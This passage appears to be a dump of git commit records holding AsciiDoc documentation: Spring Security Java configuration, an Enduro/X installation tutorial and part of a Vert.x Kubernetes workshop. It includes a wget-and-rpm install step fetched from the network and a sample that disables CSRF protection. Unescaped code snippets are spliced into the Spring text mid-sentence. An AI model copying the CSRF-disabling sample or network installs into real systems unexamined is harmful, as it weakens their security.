.anyRequest().authenticated()\n\t\t\t\t)\n\t\t\t\t.formLogin(withDefaults());\n\t\t}\n\t}\n}\n----\n\n<1> Configure Authentication as normal\n<2> Create an instance of `WebSecurityConfigurerAdapter` that contains `@Order` to specify which `WebSecurityConfigurerAdapter` should be considered first.\n<3> The `http.antMatcher` states that this `HttpSecurity` will only be applicable to URLs that start with `\/api\/`\n<4> Create another instance of `WebSecurityConfigurerAdapter`.\nIf the URL does not start with `\/api\/` this configuration will be used.\nThis configuration is considered after `ApiWebSecurityConfigurationAdapter` since it has an `@Order` value after `1` (no `@Order` defaults to last).\n\n\n[[jc-method]]\n== Method Security\n\nFrom version 2.0 onwards Spring Security has improved support substantially for adding security to your service layer methods.\nIt provides support for JSR-250 annotation security as well as the framework's original `@Secured` annotation.\nFrom 3.0 you can also make use of new <<el-access,expression-based annotations>>.\nYou can apply security to a single bean, using the `intercept-methods` element to decorate the bean declaration, or you can secure multiple beans across the entire service layer using the AspectJ style pointcuts.\n\n=== EnableGlobalMethodSecurity\n\nWe can enable annotation-based security using the `@EnableGlobalMethodSecurity` annotation on any `@Configuration` instance.\nFor example, the following would enable Spring Security's `@Secured` annotation.\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(securedEnabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nAdding an annotation to a method (on a class or interface) would then limit the access to that method accordingly.\nSpring Security's native annotation support defines a set of attributes for the method.\nThese will 
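As an alternative to the `BCryptPasswordEncoder` bean shown earlier, Spring Security 5+ also provides a delegating encoder that can verify several hash formats behind a single bean; a sketch:

[source,java]
----
@Bean
public PasswordEncoder passwordEncoder() {
	// delegates to bcrypt for new hashes while still matching older stored formats
	return PasswordEncoderFactories.createDelegatingPasswordEncoder();
}
----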
be passed to the AccessDecisionManager for it to make the actual decision:\n\n[source,java]\n----\npublic interface BankService {\n\n@Secured(\"IS_AUTHENTICATED_ANONYMOUSLY\")\npublic Account readAccount(Long id);\n\n@Secured(\"IS_AUTHENTICATED_ANONYMOUSLY\")\npublic Account[] findAccounts();\n\n@Secured(\"ROLE_TELLER\")\npublic Account post(Account account, double amount);\n}\n----\n\nSupport for JSR-250 annotations can be enabled using\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(jsr250Enabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nThese are standards-based and allow simple role-based constraints to be applied but do not have the power of Spring Security's native annotations.\nTo use the new expression-based syntax, you would use\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nand the equivalent Java code would be\n\n[source,java]\n----\npublic interface BankService {\n\n@PreAuthorize(\"isAnonymous()\")\npublic Account readAccount(Long id);\n\n@PreAuthorize(\"isAnonymous()\")\npublic Account[] findAccounts();\n\n@PreAuthorize(\"hasAuthority('ROLE_TELLER')\")\npublic Account post(Account account, double amount);\n}\n----\n\n=== GlobalMethodSecurityConfiguration\n\nSometimes you may need to perform operations that are more complicated than the `@EnableGlobalMethodSecurity` annotation allows.\nFor these instances, you can extend the `GlobalMethodSecurityConfiguration` class, ensuring that the `@EnableGlobalMethodSecurity` annotation is present on your subclass.\nFor example, if you wanted to provide a custom `MethodSecurityExpressionHandler`, you could use the following configuration:\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig extends GlobalMethodSecurityConfiguration {\n\t@Override\n\tprotected MethodSecurityExpressionHandler createExpressionHandler() {\n\t\t\/\/ ... create and return custom MethodSecurityExpressionHandler ...\n\t\treturn expressionHandler;\n\t}\n}\n----\n\nFor additional information about methods that can be overridden, refer to the `GlobalMethodSecurityConfiguration` Javadoc.\n
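For illustration, a `createExpressionHandler` override might return a `DefaultMethodSecurityExpressionHandler` with a custom evaluator plugged in (the `CustomPermissionEvaluator` here is hypothetical):

[source,java]
----
@Override
protected MethodSecurityExpressionHandler createExpressionHandler() {
	DefaultMethodSecurityExpressionHandler expressionHandler =
			new DefaultMethodSecurityExpressionHandler();
	// hypothetical evaluator backing hasPermission() expressions
	expressionHandler.setPermissionEvaluator(new CustomPermissionEvaluator());
	return expressionHandler;
}
----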
== Post Processing Configured Objects\n\nSpring Security's Java Configuration does not expose every property of every object that it configures.\nThis simplifies the configuration for a majority of users.\nAfter all, if every property were exposed, users could use standard bean configuration.\n\nWhile there are good reasons to not directly expose every property, users may still need more advanced configuration options.\nTo address this, Spring Security introduces the concept of an `ObjectPostProcessor` which can be used to modify or replace many of the Object instances created by the Java Configuration.\nFor example, if you wanted to configure the `filterSecurityPublishAuthorizationSuccess` property on `FilterSecurityInterceptor`, you could use the following:\n\n[source,java]\n----\n@Override\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t\tauthorizeRequests\n\t\t\t\t.anyRequest().authenticated()\n\t\t\t\t.withObjectPostProcessor(new ObjectPostProcessor<FilterSecurityInterceptor>() {\n\t\t\t\t\tpublic <O extends FilterSecurityInterceptor> O postProcess(\n\t\t\t\t\t\t\tO fsi) {\n\t\t\t\t\t\tfsi.setPublishAuthorizationSuccess(true);\n\t\t\t\t\t\treturn fsi;\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t);\n}\n----\n\n[[jc-custom-dsls]]\n== Custom DSLs\n\nYou can provide your own custom DSLs in Spring Security.\nFor example, you might have something that looks like this:\n\n[source,java]\n----\npublic class MyCustomDsl extends AbstractHttpConfigurer<MyCustomDsl, HttpSecurity> {\n\tprivate boolean flag;\n\n\t@Override\n\tpublic void init(HttpSecurity http) throws Exception {\n\t\t\/\/ any method that adds another configurer\n\t\t\/\/ must be done in the init method\n\t\thttp.csrf().disable();\n\t}\n\n\t@Override\n\tpublic void configure(HttpSecurity http) throws Exception {\n\t\tApplicationContext context = http.getSharedObject(ApplicationContext.class);\n\n\t\t\/\/ here we look up from the ApplicationContext. You can also just create a new instance.\n\t\tMyFilter myFilter = context.getBean(MyFilter.class);\n\t\tmyFilter.setFlag(flag);\n\t\thttp.addFilterBefore(myFilter, UsernamePasswordAuthenticationFilter.class);\n\t}\n\n\tpublic MyCustomDsl flag(boolean value) {\n\t\tthis.flag = value;\n\t\treturn this;\n\t}\n\n\tpublic static MyCustomDsl customDsl() {\n\t\treturn new MyCustomDsl();\n\t}\n}\n----\n\nNOTE: This is actually how methods like `HttpSecurity.authorizeRequests()` are implemented.\n
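The `MyFilter` collaborator above is assumed rather than defined. A minimal sketch of what such a filter could look like, based on `OncePerRequestFilter`:

[source,java]
----
public class MyFilter extends OncePerRequestFilter {
	private boolean flag;

	public void setFlag(boolean flag) {
		this.flag = flag;
	}

	@Override
	protected void doFilterInternal(HttpServletRequest request,
			HttpServletResponse response, FilterChain filterChain)
			throws ServletException, IOException {
		// hypothetical behaviour toggled through the DSL's flag() method
		filterChain.doFilter(request, response);
	}
}
----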
The custom DSL can then be used like this:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class Config extends WebSecurityConfigurerAdapter {\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.apply(customDsl())\n\t\t\t\t.flag(true)\n\t\t\t\t.and()\n\t\t\t...;\n\t}\n}\n----\n\nThe code is invoked in the following order:\n\n* Code in `Config`'s configure method is invoked\n* Code in `MyCustomDsl`'s init method is invoked\n* Code in `MyCustomDsl`'s configure method is invoked\n\nIf you want, you can have `WebSecurityConfigurerAdapter` add `MyCustomDsl` by default by using `SpringFactories`.\nFor example, you would create a resource on the classpath named `META-INF\/spring.factories` with the following contents:\n\n.META-INF\/spring.factories\n----\norg.springframework.security.config.annotation.web.configurers.AbstractHttpConfigurer = sample.MyCustomDsl\n----\n\nUsers wishing to disable the default can do so explicitly.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class Config extends WebSecurityConfigurerAdapter {\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.apply(customDsl()).disable()\n\t\t\t...;\n\t}\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0efd6dc10d9a57014df37c4719b292fc428102e","subject":"Update GettingStartedTutorial.adoc","message":"Update GettingStartedTutorial.adoc","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/GettingStartedTutorial.adoc","new_file":"doc\/GettingStartedTutorial.adoc","new_contents":"Getting Started Tutorial\n========================\nMadars Vitolins\nv1.0, 2015-11:\n\tInitial draft\n:doctype: book\n\nAbout the guide\n---------------\nGetting started tutorial covers Enduro\/X installation from binary package,\nenvironment setup, creating a sample Enduro\/X server and creating a sample client.\nThis includes creating the necessary configuration files. Finally, the application is booted,\nand the client process calls the sample server process.\n\n== Configuring Linux Kernel parameters\n\nKernel parameter configuration is needed for Enduro\/X runtime. It includes changing\nthe security and Posix queue settings.\n\n=== Security Configuration\n---------------------------------------------------------------------\n$ su - root\n# cat << EOF >> \/etc\/security\/limits.conf\n\n# Do not limit message Q Count.\n# Some Linux 3.x series kernels have a bug, that limits 1024 \n# queues for one system user.\n# In 2.6.x and 4.x this is fixed, to have \n# unlimited count of queues (memory limit).\n# earlier and later Linuxes have fixed this issue.\n* soft msgqueue -1\n* hard msgqueue -1\n\n# Increase the number of open files \n* soft nofile 1024\n* hard nofile 65536\n\nEOF\n---------------------------------------------------------------------\n\n=== Message Queue Configuration\nAt system startup, a Posix queues folder needs to be mounted, and \nappropriate limits need to be set. 
To do this automatically at system startup, \nLinuxes which supports '\/etc\/rc.local', must add following lines before \"exit 0\":\n\n---------------------------------------------------------------------\n# Mount the \/dev\/mqueue\nmkdir \/dev\/mqueue\nmount -t mqueue none \/dev\/mqueue\n\n# Max Messages in Queue\necho 10000 > \/proc\/sys\/fs\/mqueue\/msg_max\n\n# Max message size (Currently Enduro\/X supports only 32K as max)\necho 32000 > \/proc\/sys\/fs\/mqueue\/msgsize_max\n\n# Max number of queues for user\necho 10000 > \/proc\/sys\/fs\/mqueue\/queues_max\n---------------------------------------------------------------------\n\n== Installing binary package (RPM for Centos 6.x)\n---------------------------------------------------------------------\n# wget http:\/\/www.endurox.org\/attachments\/download\/6\/endurox-2.3.2-1.centos6.x86_64.rpm\n# rpm -i endurox-2.3.2-1.centos6.x86_64.rpm\n---------------------------------------------------------------------\n\n== Configuring the application environment \nWe will run our app \"app1\" from new user \"user1\". Application domain will be located in \/opt\/app1 folder. With follwing direcotry structure:\n[options=\"compact\"]\n- \/opt\/app1\/conf - will contain configuration files.\n- \/opt\/app1\/src\/eclient - Enduro\/X sample client sources.\n- \/opt\/app1\/src\/eserver - Enduro\/X sample server process sources.\n- \/opt\/app1\/bin - for executables.\n- \/opt\/app1\/ubftab - for tables for field defintions.\n\nCreate the user & directories:\n---------------------------------------------------------------------\n# useradd -m user1\n# mkdir -p \/opt\/app1\/conf\n# mkdir -p \/opt\/app1\/src\/eclient\n# mkdir -p \/opt\/app1\/src\/eserver\n# mkdir -p \/opt\/app1\/bin\n# mkdir -p \/opt\/app1\/ubftab\n# mkdir -p \/opt\/app1\/tmp\n# mkdir -p \/opt\/app1\/log\n# chown -R user1 \/opt\/app1 \n---------------------------------------------------------------------\nNext we will configure environment files, file \/opt\/app1\/conf\/setndrx - this will contain neccessary configuration for Enduro\/X.\n\nCopy following text to \/opt\/app1\/conf\/setndrx\n---------------------------------------------------------------------\n#!\/bin\/bash\nexport NDRX_NODEID=1\n# If 1 - then yes, if 0 - then not clusterised.\nexport NDRX_CLUSTERISED=0\n# Load balance, 0 = process all locally, 100 = process all on remote servers\nexport NDRX_LDBAL=0\n# tpcall() timeout:\nexport NDRX_TOUT=60\n# where to write ulog\nexport NDRX_ULOG=\/opt\/app1\/log\nexport NDRX_QPREFIX=\/app1\nexport NDRX_SVCMAX=20000\nexport NDRX_SRVMAX=10000\nexport NDRX_QPATH=\/dev\/mqueue\nexport NDRX_SHMPATH=\/dev\/shm\n# Milli seconds to wait for command\nexport NDRX_CMDWAIT=1\nexport NDRX_DPID=\/opt\/app1\/tmp\/ndrxd.pid\n# Random key to indentify the processes beloning to this session (i.e. 
used in ps ef)\nexport NDRX_RNDK=\"0myWI5nu\"\n# System V Semaphores...\nexport NDRX_IPCKEY=44000\n# Posix queue config (attribs..)\n# Max number of messages that can be put in one queue\nexport NDRX_MSGMAX=1000\n# Daemon Q size...\nexport NDRX_DQMAX=100\n# Max message size (in bytes), max 64K\nexport NDRX_MSGSIZEMAX=10000\n# Where app domain lives\nexport NDRX_APPHOME=\/opt\/app1\n# Where NDRX runtime lives\nexport NDRX_HOME=\/usr\n# Debug config too\nexport NDRX_DEBUG_CONF=\/opt\/app1\/conf\/debug.conf\n# NDRX config too.\nexport NDRX_CONFIG=\/opt\/app1\/conf\/ndrxconfig.xml\nexport PATH=$PATH:\/opt\/app1\/bin\nexport export FLDTBLDIR=\/opt\/app1\/ubftab\n# Max fields for hashing UBF\nexport NDRX_UBFMAXFLDS=16000\n\n# Log & levels (basic for scripting..)\nexport NDRX_DMNLOG=\/opt\/app1\/log\/ndrxd.log\nexport NDRX_DMNLEV=5\n\nexport NDRX_LOG=\/opt\/app1\/log\/ndrx.log\nexport NDRX_LEV=5\n\n# Correct the path so that ndrx can find ndrxd\nexport PATH=$PATH:$NDRX_HOME\/bin\n\n# UBFTAB Exfields - Enduro\/X specifc, test.fd - our apps' UBF fields \nexport FIELDTBLS=Exfields,test.fd\n---------------------------------------------------------------------\n\n\n\nDebug config\n---------------------------------------------------------------------\n..\n---------------------------------------------------------------------\n\n== Creating the server process\n\n=== Defining the UBF fields\n\n=== Server source code\n\n=== Booting the server process\n\n=== Testing the service with \"ud\" command\n\n== Creating the client application\n\n=== Client binary source code\n\n=== Running the client process\n\n== Conclusions\n\n:numbered!:\n\n[bibliography]\nAdditional documentation \n------------------------\nThis section lists additional related documents.\n\n[bibliography]\n.Internet resources\n- [[[ATMI-API]]] http:\/\/docs.oracle.com\/cd\/E13203_01\/tuxedo\/tux71\/html\/pgint6.htm\n- [[[FML-API]]] http:\/\/docs.oracle.com\/cd\/E13203_01\/tuxedo\/tux91\/fml\/index.htm\n- [[[EX_OVERVIEW]]] ex_overview.pdf\n- [[[MQ_OVERVIEW]]] 'man 7 mq_overview'\n- [[[EX_ENV]]] 'man 5 ex_env' or 'ex_env.pdf'\n- [[[NDRXCONFIG]]] 'man 5 ndrxconfig.xml' or 'ndrxconfig.xml.pdf'\n- [[[DEBUGCONF]]] 'man 5 ndrxdebug.conf' or 'ndrxdebug.conf.pdf'\n- [[[XADMIN]]] 'man 8 xadmin' or 'xadmin.pdf'\n\n[glossary]\nGlossary\n--------\nThis section lists\n\n[glossary]\nATMI::\n Application Transaction Monitor Interface\n\nUBF::\n Unified Buffer Format it is similar API as Tuxedo's FML\n\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\nThe index is normally left completely empty, it's contents being\ngenerated automatically by the DocBook toolchain.\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n","old_contents":"Getting Started Tutorial\n========================\nMadars Vitolins\nv1.0, 2015-11:\n\tInitial draft\n:doctype: book\n\nAbout the guide\n---------------\nGetting started tutorial covers Enduro\/X installation from binary package,\nenvironment setup, creating a sample Enduro\/X server and creating sample client.\nThis include creating a neccessary configuration files. Finally the applicatioin is booted,\nand client process calls the sample server process.\n\n== Configuring Linux Kernel parameters\n\nKernel parameter configuration is needed for Enduro\/X runtime. 
It includes changing\nthe security and Posix queue settings.\n\n=== Security Configuration\n---------------------------------------------------------------------\n$ su - root\n# cat << EOF >> \/etc\/security\/limits.conf\n\n# Do not limit message Q Count.\n# Some Linux 3.x series kernels have a bug, that limits 1024 \n# queues for one system user.\n# In 2.6.x and 4.x this is fixed, to have \n# unlimited count of queues (memory limit).\n# ealrier and later Linuxes have fixed this issue.\n* soft msgqueue -1\n* hard msgqueue -1\n\n# Increase the number of open files \n* soft nofile 1024\n* hard nofile 65536\n\nEOF\n---------------------------------------------------------------------\n\n=== Message Queue Configuration\nAt the startup of the system needs to mount a Posix Queues folder, and needs to \nset a appropriate limits. To do this automatically at system startup, \nLinuxes which supports '\/etc\/rc.local', must add following lines before \"exit 0\":\n\n---------------------------------------------------------------------\n# Mount the \/dev\/mqueue\nmkdir \/dev\/mqueue\nmount -t mqueue none \/dev\/mqueue\n\n# Max Messages in Queue\necho 10000 > \/proc\/sys\/fs\/mqueue\/msg_max\n\n# Max message size (Currently Enduro\/X supports only 32K as max)\necho 32000 > \/proc\/sys\/fs\/mqueue\/msgsize_max\n\n# Max number of queues for user\necho 10000 > \/proc\/sys\/fs\/mqueue\/queues_max\n---------------------------------------------------------------------\n\n== Installing binary package (RPM for Centos 6.x)\n---------------------------------------------------------------------\n# wget http:\/\/www.endurox.org\/attachments\/download\/6\/endurox-2.3.2-1.centos6.x86_64.rpm\n# rpm -i endurox-2.3.2-1.centos6.x86_64.rpm\n---------------------------------------------------------------------\n\n== Configuring the application environment \nWe will run our app \"app1\" from new user \"user1\". Application domain will be located in \/opt\/app1 folder. 
With follwing direcotry structure:\n[options=\"compact\"]\n- \/opt\/app1\/conf - will contain configuration files.\n- \/opt\/app1\/src\/eclient - Enduro\/X sample client sources.\n- \/opt\/app1\/src\/eserver - Enduro\/X sample server process sources.\n- \/opt\/app1\/bin - for executables.\n- \/opt\/app1\/ubftab - for tables for field defintions.\n\nCreate the user & directories:\n---------------------------------------------------------------------\n# useradd -m user1\n# mkdir -p \/opt\/app1\/conf\n# mkdir -p \/opt\/app1\/src\/eclient\n# mkdir -p \/opt\/app1\/src\/eserver\n# mkdir -p \/opt\/app1\/bin\n# mkdir -p \/opt\/app1\/ubftab\n# mkdir -p \/opt\/app1\/tmp\n# mkdir -p \/opt\/app1\/log\n# chown -R user1 \/opt\/app1 \n---------------------------------------------------------------------\nNext we will configure environment files, file \/opt\/app1\/conf\/setndrx - this will contain neccessary configuration for Enduro\/X.\n\nCopy following text to \/opt\/app1\/conf\/setndrx\n---------------------------------------------------------------------\n#!\/bin\/bash\nexport NDRX_NODEID=1\n# If 1 - then yes, if 0 - then not clusterised.\nexport NDRX_CLUSTERISED=0\n# Load balance, 0 = process all locally, 100 = process all on remote servers\nexport NDRX_LDBAL=0\n# tpcall() timeout:\nexport NDRX_TOUT=60\n# where to write ulog\nexport NDRX_ULOG=\/opt\/app1\/log\nexport NDRX_QPREFIX=\/app1\nexport NDRX_SVCMAX=20000\nexport NDRX_SRVMAX=10000\nexport NDRX_QPATH=\/dev\/mqueue\nexport NDRX_SHMPATH=\/dev\/shm\n# Milli seconds to wait for command\nexport NDRX_CMDWAIT=1\nexport NDRX_DPID=\/opt\/app1\/tmp\/ndrxd.pid\n# Random key to indentify the processes beloning to this session (i.e. used in ps ef)\nexport NDRX_RNDK=\"0myWI5nu\"\n# System V Semaphores...\nexport NDRX_IPCKEY=44000\n# Posix queue config (attribs..)\n# Max number of messages that can be put in one queue\nexport NDRX_MSGMAX=1000\n# Daemon Q size...\nexport NDRX_DQMAX=100\n# Max message size (in bytes), max 64K\nexport NDRX_MSGSIZEMAX=10000\n# Where app domain lives\nexport NDRX_APPHOME=\/opt\/app1\n# Where NDRX runtime lives\nexport NDRX_HOME=\/usr\n# Debug config too\nexport NDRX_DEBUG_CONF=\/opt\/app1\/conf\/debug.conf\n# NDRX config too.\nexport NDRX_CONFIG=\/opt\/app1\/conf\/ndrxconfig.xml\nexport PATH=$PATH:\/opt\/app1\/bin\nexport export FLDTBLDIR=\/opt\/app1\/ubftab\n# Max fields for hashing UBF\nexport NDRX_UBFMAXFLDS=16000\n\n# Log & levels (basic for scripting..)\nexport NDRX_DMNLOG=\/opt\/app1\/log\/ndrxd.log\nexport NDRX_DMNLEV=5\n\nexport NDRX_LOG=\/opt\/app1\/log\/ndrx.log\nexport NDRX_LEV=5\n\n# Correct the path so that ndrx can find ndrxd\nexport PATH=$PATH:$NDRX_HOME\/bin\n\n# UBFTAB Exfields - Enduro\/X specifc, test.fd - our apps' UBF fields \nexport FIELDTBLS=Exfields,test.fd\n---------------------------------------------------------------------\n\nBasic application server configuration (\/opt\/app1\/conf\/ndrxconfig.xml)\n---------------------------------------------------------------------\n<?xml version=\"1.0\" ?>\n<endurox>\n <appconfig>\n <!-- ALL BELLOW ONES USES <sanity> periodical timer -->\n <!-- Sanity check time, sec -->\n <sanity>5<\/sanity>\n <!--\n Seconds in which we should send service refresh to other node.\n -->\n <brrefresh>6<\/brrefresh>\n \n <!-- <sanity> timer, end -->\n \n <!-- ALL BELLOW ONES USES <respawn> periodical timer -->\n <!-- Do dead process restart every X seconds \n NOT USED ANYMORE, REPLACED WITH SANITY!\n <respawncheck>10<\/respawncheck>\n -->\n <!-- Do process reset after 1 sec -->\n 
<restart_min>1<\/restart_min>\n <!-- If the restart fails, wait <restart_step> sec more before the next attempt -->\n <restart_step>1<\/restart_step>\n <!-- If the process still has not started, wait at most <restart_max> sec between attempts -->\n <restart_max>5<\/restart_max>\n <!-- <sanity> timer, end -->\n \n <!-- Time after attach when program will start doing sanity & respawn checks,\n starts counting after configuration load -->\n <restart_to_check>20<\/restart_to_check>\n \n <!-- Setting for pq command, should ndrxd collect service \n queue stats automatically\n If set to Y or y, then queue stats are on.\n Default is off.\n -->\n <gather_pq_stats>Y<\/gather_pq_stats>\n \n\t<\/appconfig>\n <defaults>\n <min>1<\/min>\n <max>2<\/max>\n <!-- Kill the process which has not started in <start_max> time -->\n <autokill>1<\/autokill>\n <!--\n <respawn>1<respawn>\n -->\n <!--\n <env><\/env> works here too!\n -->\n <!-- The maximum time while process can hang in 'starting' state i.e.\n have not completed initialization, sec\n X <= 0 = disabled \n -->\n <start_max>2<\/start_max>\n <!--\n Ping server in every X seconds (step is <sanity>).\n -->\n <pingtime>1<\/pingtime>\n <!--\n Max time in seconds in which server must respond.\n The granularity is sanity time.\n X <= 0 = disabled \n -->\n <ping_max>4<\/ping_max>\n <!--\n Max time to wait until process should exit on shutdown\n X <= 0 = disabled \n -->\n <end_max>30<\/end_max>\n <!-- Interval, in seconds, by which signal sequence -2, -15, -9, -9.... will be sent\n to process until it has been terminated. -->\n <killtime>1<\/killtime>\n <!-- List of services (comma separated) for ndrxd to export services over bridges -->\n <!-- <exportsvcs>FOREX<\/exportsvcs> -->\n\t<\/defaults>\n\t<servers>\n\t\t<!-- This is the binary we are about to build -->\n\t\t<server name=\"eserver\">\n\t\t\t<srvid>1<\/srvid>\n\t\t\t<min>2<\/min>\n\t\t\t<max>2<\/max>\n\t\t\t<sysopt>-e \/opt\/app1\/log\/ESERVER -r<\/sysopt>\n\t\t<\/server>\n\t<\/servers>\n<\/endurox>\n\n---------------------------------------------------------------------\n\nDebug config\n\nThe file \/opt\/app1\/conf\/debug.conf (referenced by NDRX_DEBUG_CONF above) controls the per-binary logging levels. The block below is only an illustrative sketch - see <<DEBUGCONF>> for the authoritative format, and adjust the levels and log file paths to your installation:\n---------------------------------------------------------------------\n* ndrx=5 ubf=0 lines=1 bufsz=1000 file=\nxadmin file=\/opt\/app1\/log\/xadmin.log\n---------------------------------------------------------------------\n\n== Creating the server process\n\n=== Defining the UBF fields\n\n=== Server source code\n\n=== Booting the server process\n\n=== Testing the service with \"ud\" command\n\n== Creating the client application\n\n=== Client binary source code\n\n=== Running the client process\n\n== Conclusions\n\n:numbered!:\n\n[bibliography]\nAdditional documentation \n------------------------\nThis section lists additional related documents.\n\n[bibliography]\n.Internet resources\n- [[[ATMI-API]]] http:\/\/docs.oracle.com\/cd\/E13203_01\/tuxedo\/tux71\/html\/pgint6.htm\n- [[[FML-API]]] http:\/\/docs.oracle.com\/cd\/E13203_01\/tuxedo\/tux91\/fml\/index.htm\n- [[[EX_OVERVIEW]]] ex_overview.pdf\n- [[[MQ_OVERVIEW]]] 'man 7 mq_overview'\n- [[[EX_ENV]]] 'man 5 ex_env' or 'ex_env.pdf'\n- [[[NDRXCONFIG]]] 'man 5 ndrxconfig.xml' or 'ndrxconfig.xml.pdf'\n- [[[DEBUGCONF]]] 'man 5 ndrxdebug.conf' or 'ndrxdebug.conf.pdf'\n- [[[XADMIN]]] 'man 8 xadmin' or 'xadmin.pdf'\n\n[glossary]\nGlossary\n--------\nThis section lists the terms used within this document.\n\n[glossary]\nATMI::\n Application Transaction Monitor Interface\n\nUBF::\n Unified Buffer Format, an API similar to Tuxedo's FML\n\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\nThe index is normally left completely empty, its contents 
being\ngenerated automatically by the DocBook toolchain.\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"97d16dddf346c4641411c4235e743f222dc29db3","subject":"Minor changes based on review","message":"Minor changes based on review\n","repos":"cescoffier\/vertx-kubernetes-workshop,cescoffier\/vertx-kubernetes-workshop,cescoffier\/vertx-kubernetes-workshop,cescoffier\/vertx-kubernetes-workshop","old_file":"docs\/chapters\/4-kubernetes.adoc","new_file":"docs\/chapters\/4-kubernetes.adoc","new_contents":"## First step with Kubernetes\n\nFollowing a microservice approach will help you increase your _agility_. However, it does not come for free and\nrequires a lot of discipline. It also stresses your deployment facilities. When the number of microservices grows, it\nvery quickly becomes an issue to keep your system on track.\n\nTo help us with this, containers are a great packaging and runtime technology. Your application runs in an\n_isolated_ container, avoiding resource conflicts. But to deploy a set of containers and keep them coordinated, you\nneed a container platform. That's what Kubernetes is. Kubernetes defines a set of building blocks (\"primitives\") which\ncollectively provide mechanisms for deploying, maintaining, and scaling applications packaged inside containers. OpenShift\n _extends_ Kubernetes with build automation and a routing system, while inheriting all the primitives from Kubernetes.\n\nimage::openshift-architecture.png[OpenShift Architecture, 800]\n\n### Primitives\n\n#### Pod\n\nThe basic scheduling unit in Kubernetes is called a _pod_. It adds a higher level of abstraction to containerized components.\nA pod consists of one or more containers that are guaranteed to be co-located on the host machine and can share resources.\nEach pod in Kubernetes is assigned a unique (within the cluster) IP address, which allows applications to use ports without\n the risk of conflict. A pod can define a _volume_, such as a local disk directory or a network disk, and expose it to\n the containers in the pod. Pods can be manually managed through the Kubernetes API, or their management can be\n delegated to a controller.\n\n#### Labels and Selectors\n\nKubernetes enables clients (users or internal components) to attach key-value pairs called _labels_ to any API object\n in the system, such as pods. Correspondingly, _label selectors_ are queries against labels that resolve to matching\n objects. Labels and selectors are the primary grouping mechanism in Kubernetes and are used to determine the components\n to which an operation applies. Labels and selectors are used to group entities together.\n\n#### Replication Controller and Deployment\n\nControllers are entities managing other entities in order to keep them in a specific state. For instance, a\nreplication controller has the responsibility to keep alive _x_ replicas of a pod. When one of these replicas dies or\n becomes unresponsive, the controller kills it and restarts one. Likewise, if there are more replicas running than desired,\n it deletes as many as necessary to match the number.\n\nThe definition of a replication controller consists mainly of:\n\n1. The number of replicas desired (which can be adjusted at runtime).\n2. A pod definition for creating a replicated pod.\n3. 
A selector for identifying managed pods (using labels).\n\nBuilding on replication controllers, OpenShift expands support for the deployment lifecycle with the concept of _deployments_.\n In the simplest case, a deployment just creates a new replication controller and lets it start up pods. However, OpenShift\n deployments also provide the ability to transition from an existing deployment (_v1_ for instance) of an image to a new\n one (_v2_ for instance) and also define hooks to be run before or after creating the replication controller.\n\nOpenShift deployments propose a set of strategies. The default is _rolling_ which implements (as the name implies) rolling \nupdates and ensures that you don't disrupt your service. Before stopping the pod, it ensures that the new _version_ is alive and \nready. Then, it routes requests to this new pod and disposes of the old one. Other strategies provided include _recreate_, \n_blue-green_, _A\/B_, and the ability to create a custom strategy.\n\n#### Build and Image\n\nAs stated in the previous section, `deployments` are responsible for keeping the application running. But we need to\nprovide the application first. The application is pushed to OpenShift as a (container) _image_. This image is\ncreated by a _build_ and instantiated by the _deployment_.\n\nA build is the process of transforming your code into an image. The process is described in a `BuildConfig` object. Build\nobjects share common characteristics: inputs for a build (source code, artifacts), the need to complete a build process,\nlogging the build process, publishing resources from successful builds, and publishing the final status of the build.\n\nThere are different types of builds. You can create a `Docker` build taking a `Dockerfile` as parameter. The\nresulting image is generated by _building_ the `Dockerfile`. OpenShift also provides the concept of S2I (Source to\nImage) as a tool to provide reproducible images. In this lab, we are going to use S2I with binary content. We are\ngoing to build the application on our machine and push the resulting artifact (a _fat jar_) as input to an S2I build.\nThis build creates an image for starting the application.\n\nimage::openshift-build-process.png[OpenShift Build Process, 800]\n\n#### Services\n\nOk, so we know how our application is going to be _built_ and instantiated on OpenShift. But how are we going to use\nit? For this we need _services_. A _service_ identifies a set of pods (using labels) in order to proxy the connections\nit receives to them. Backing pods can be added to or removed from a service arbitrarily while the service remains\nconsistently available, enabling anything that depends on the service to refer to it at a consistent internal address.\n\nServices are assigned an IP address and port pair that, when accessed, proxy to an appropriate backing pod. A service\nuses a label selector to find all the containers running that provide a certain network service on a certain port.\n\nimage::openshift-service.png[OpenShift Services, 400]\n\n#### 